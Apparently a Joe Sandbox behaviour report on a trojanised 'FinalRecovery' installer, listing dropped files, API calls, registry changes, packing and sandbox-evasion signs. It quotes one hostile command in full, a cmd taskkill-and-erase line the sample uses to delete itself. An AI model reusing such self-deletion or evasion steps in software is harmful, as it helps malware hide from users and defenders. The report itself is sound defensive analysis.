Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00404840		2_2_00404840
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_004109D0		2_2_004109D0
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_0042AB1A		2_2_0042AB1A
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00421C08		2_2_00421C08
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_0042AC3A		2_2_0042AC3A
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00428CB9		2_2_00428CB9
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00447D2D		2_2_00447D2D
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00404F20		2_2_00404F20
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_1000E111		2_2_1000E111
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_1000FAC0		2_2_1000FAC0

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: String function: 10003100 appears 34 times
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: String function: 0040F960 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: String function: 00405964 appears 108 times
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: String function: 00403400 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: String function: 00406AA4 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: String function: 0044540C appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: String function: 004456DC appears 59 times
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: String function: 004526A4 appears 91 times
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: String function: 00433B14 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: String function: 00456D64 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: String function: 004078D4 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: String function: 00456B58 appears 93 times
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: String function: 00403494 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: String function: 00408BEC appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: String function: 00403684 appears 218 times

Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_0042F178 NtdllDefWindowProc_A,		1_2_0042F178
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_00423B6C NtdllDefWindowProc_A,		1_2_00423B6C
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_004563D8 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,		1_2_004563D8
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_004125C0 NtdllDefWindowProc_A,		1_2_004125C0
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_004771E0 NtdllDefWindowProc_A,		1_2_004771E0

Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp

Code function: 1_2_0042E780: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,

1_2_0042E780

Source: file.exe	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: file.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: file.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
Source: file.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: file.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: file.tmp.0.dr	Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
Source: is-H9OSH.tmp.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-H9OSH.tmp.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
Source: is-H9OSH.tmp.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: is-H9OSH.tmp.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-H9OSH.tmp.1.dr	Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped

Source: file.exe, 00000000.00000003.241822498.0000000002138000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
Source: file.exe, 00000000.00000003.241621215.0000000002320000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe

Source: Joe Sandbox View

Dropped File: C:\Program Files (x86)\FgasoftFR\FinalRecovery\Preview.exe (copy) 233D846FEB73A38141BDF6C813C7476FA3F66DCD3548338607F3B7CB61CAC730

Source: finalrecovery.exe.1.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_SYSHEAP, IMAGE_SCN_MEM_PURGEABLE, IMAGE_SCN_MEM_16BIT, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_PRELOAD, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: _RegDLL.tmp.1.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp" /SL5="$4025C,1578849,54272,C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Process created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe"
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\wEQg8.exe
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "finalrecovery.exe" /f & erase "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "finalrecovery.exe" /f
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp" /SL5="$4025C,1578849,54272,C:\Users\user\Desktop\file.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Process created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe"			Jump to behavior
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\wEQg8.exe			Jump to behavior
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "finalrecovery.exe" /f & erase "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe" & exit			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "finalrecovery.exe" /f			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		0_2_00409420
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_00454800 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		1_2_00454800

Source: C:\Windows\SysWOW64\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "finalrecovery.exe")

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp

Jump to behavior

Source: classification engine

Classification label: mal92.troj.evad.winEXE@12/24@0/4

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Code function: 2_2_00401B40 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,

2_2_00401B40

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp

Code function: 1_2_00455028 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,

1_2_00455028

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Code function: 2_2_00402C00 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,

2_2_00402C00

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Code function: 2_2_00405350 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,FindCloseChangeNotification,

2_2_00405350

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3092:120:WilError_01

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00409BC4 FindResourceA,SizeofResource,LoadResource,LockResource,

0_2_00409BC4

Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp

File created: C:\Program Files (x86)\FgasoftFR

Jump to behavior

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Command line argument: `a}{		2_2_00409670
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Command line argument: MFE.		2_2_00409670

Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp

Window found: window name: TMainForm

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: file.exe

Static file information: File size 1825141 > 1048576

Data Obfuscation

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Unpacked PE file: 2.2.finalrecovery.exe.400000.1.unpack

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Unpacked PE file: 2.2.finalrecovery.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R;.fga20:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp" /SL5="$4025C,1578849,54272,C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp" /SL5="$4025C,1578849,54272,C:\Users\user\Desktop\file.exe"			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00406590 push 004065CDh; ret		0_2_004065C5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004080DC push ecx; mov dword ptr [esp], eax		0_2_004080E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004040B5 push eax; ret		0_2_004040F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404185 push 00404391h; ret		0_2_00404389
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404206 push 00404391h; ret		0_2_00404389
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040C218 push eax; ret		0_2_0040C219
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004042E8 push 00404391h; ret		0_2_00404389
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404283 push 00404391h; ret		0_2_00404389
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00408F10 push 00408F43h; ret		0_2_00408F3B
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_0040992C push 00409969h; ret		1_2_00409961
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_0040A027 push ds; ret		1_2_0040A028
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_00476228 push ecx; mov dword ptr [esp], edx		1_2_00476229
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_004062CC push ecx; mov dword ptr [esp], eax		1_2_004062CD
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_0045866C push 004586B0h; ret		1_2_004586A8
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_004106B8 push ecx; mov dword ptr [esp], edx		1_2_004106BD
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_0040A77C push C00040C3h; ret		1_2_0040A781
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_00412910 push 00412973h; ret		1_2_0041296B
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_00442A78 push ecx; mov dword ptr [esp], ecx		1_2_00442A7C
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_00450B58 push 00450B8Bh; ret		1_2_00450B83
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_00450D1C push ecx; mov dword ptr [esp], eax		1_2_00450D21
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_00456E00 push 00456E38h; ret		1_2_00456E30
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_00492EC8 push ecx; mov dword ptr [esp], ecx		1_2_00492ECD
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_0040D010 push ecx; mov dword ptr [esp], edx		1_2_0040D012
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_0045F0C0 push ecx; mov dword ptr [esp], ecx		1_2_0045F0C4
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_0040546D push eax; ret		1_2_004054A9
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_0040F570 push ecx; mov dword ptr [esp], edx		1_2_0040F572
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_00483538 push ecx; mov dword ptr [esp], ecx		1_2_0048353D
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_0040553D push 00405749h; ret		1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_004055BE push 00405749h; ret		1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_0040563B push 00405749h; ret		1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_004056A0 push 00405749h; ret		1_2_00405741

Source: finalrecovery.exe.1.dr

Static PE information: section name: .fga20

Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp

Code function: 1_2_0044AC90 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_0044AC90

Source: initial sample

Static PE information: section name: .text entropy: 7.3303142565000785

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	File created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Temp\is-J872N.tmp\_isetup\_shfoldr.dll			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	File created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-J1RPT.tmp			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Temp\is-J872N.tmp\_isetup\_RegDLL.tmp			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	File created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\unins000.exe (copy)			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Temp\is-J872N.tmp\_isetup\_iscrypt.dll			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	File created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-H9OSH.tmp			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	File created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\Preview.exe (copy)			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp			Jump to dropped file
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\wEQg8.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Temp\is-J872N.tmp\_isetup\_setup64.tmp			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_00423BF4 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,		1_2_00423BF4
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_00423BF4 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,		1_2_00423BF4
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_0042417C IsIconic,SetActiveWindow,		1_2_0042417C
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_004241C4 IsIconic,SetActiveWindow,SetFocus,		1_2_004241C4
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_0041836C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,		1_2_0041836C
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_00422844 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,		1_2_00422844
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_00417580 IsIconic,GetCapture,		1_2_00417580
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_00481878 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,		1_2_00481878
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_00417CB6 IsIconic,SetWindowPos,		1_2_00417CB6
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_00417CB8 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,		1_2_00417CB8

Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp

Code function: 1_2_0044AC90 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_0044AC90

Source: C:\Users\user\Desktop\file.exe	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetSystemTime,DecisionNodes

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-J872N.tmp\_isetup\_shfoldr.dll			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-J1RPT.tmp			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-J872N.tmp\_isetup\_RegDLL.tmp			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\FgasoftFR\FinalRecovery\unins000.exe (copy)			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-H9OSH.tmp			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\FgasoftFR\FinalRecovery\Preview.exe (copy)			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-J872N.tmp\_isetup\_setup64.tmp			Jump to dropped file

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Code function: GetUserNameA,GetUserNameA,__Init_thread_footer,GetUserNameA,__Init_thread_footer,GetUserNameA,GetForegroundWindow,GetWindowTextA,Sleep,Sleep,GetForegroundWindow,GetWindowTextA,GetUserNameA,

2_2_004057C7

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00409B08 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,

0_2_00409B08

Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_00473B80 FindFirstFileA,FindNextFileA,FindClose,		1_2_00473B80
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_00451DC0 FindFirstFileA,GetLastError,		1_2_00451DC0
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_004963A0 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,		1_2_004963A0
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_00463080 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,		1_2_00463080
